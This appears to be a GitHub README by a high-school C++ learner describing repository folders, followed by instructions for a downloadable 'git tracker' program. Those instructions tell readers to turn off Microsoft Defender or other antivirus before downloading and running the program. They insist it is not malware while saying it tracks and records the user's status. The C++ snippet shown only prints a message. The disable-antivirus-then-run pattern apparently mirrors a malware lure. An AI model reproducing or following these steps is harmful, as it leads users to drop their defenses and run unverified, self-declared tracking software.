Hello I'm mUri and thats about it, I'm an highschool student from Eastern Asia, I have slightly experience of C++ still learning and decided to create my own repository to preserve and document about my experiences with the language and might let people see and use my files when I get older and whatelse, People can find something valuable and freely use it and provide feedbacks about issues of it.
| Learned | Languages | 
|---|---|
| 1 | C++ | 
| 2 | MYSQL | 
| 3 | Javascript | 
Consider starring ⭐ the repository if you find it useful. 👏
Click on a folder you want to view, each one is different and purposes.
The folders for this repository are:
MAIN_RESOURCE_UPDATING - All the source files from beginning to end. 
PROGRAMS_CREATED_REDIST - Programs related to the source files.
CREATED_PROGRAMS_UPDATING - Custom programs and projects I've been working on.
More folders will be added soon enough in the future with their own purpose and tasks, That's all of now I've documented & made hope you'll find this folder helpful for you when learning C++. 📦
What is this repository about?1.
How can I contribute on the repository?2.
Instructions for the program: 📋
- 
Download the program by clicking the link - Turn off microsoft defender or any virus blocker etc. while downloading the program.
- This may disrupt or damage the program file when running on your pc.
 
 
- Turn off microsoft defender or any virus blocker etc. while downloading the program.
- 
When finished donwloading click the program and run on pc - Follow the Instructions given to you when opening the program.
- Close program when finished, A command will be given by the program.
 
 
- Follow the Instructions given to you when opening the program.
- 
This program let's me know your git status for this repository. - Don't worry it's not a virus & malware, It will not effect your pc.
- This is an survey program that tracks and records your status for thiss repository.  
 
- This is an survey program that tracks and records your status for thiss repository. 
 
- Don't worry it's not a virus & malware, It will not effect your pc.
   #include <iostream>
    #include <cstdio>
  
       int main() {
        std::string userDisplayText = "Thank you for using the git tracker!";
            std::cout << userDisplayText << '\n';
       
        return 0;
       }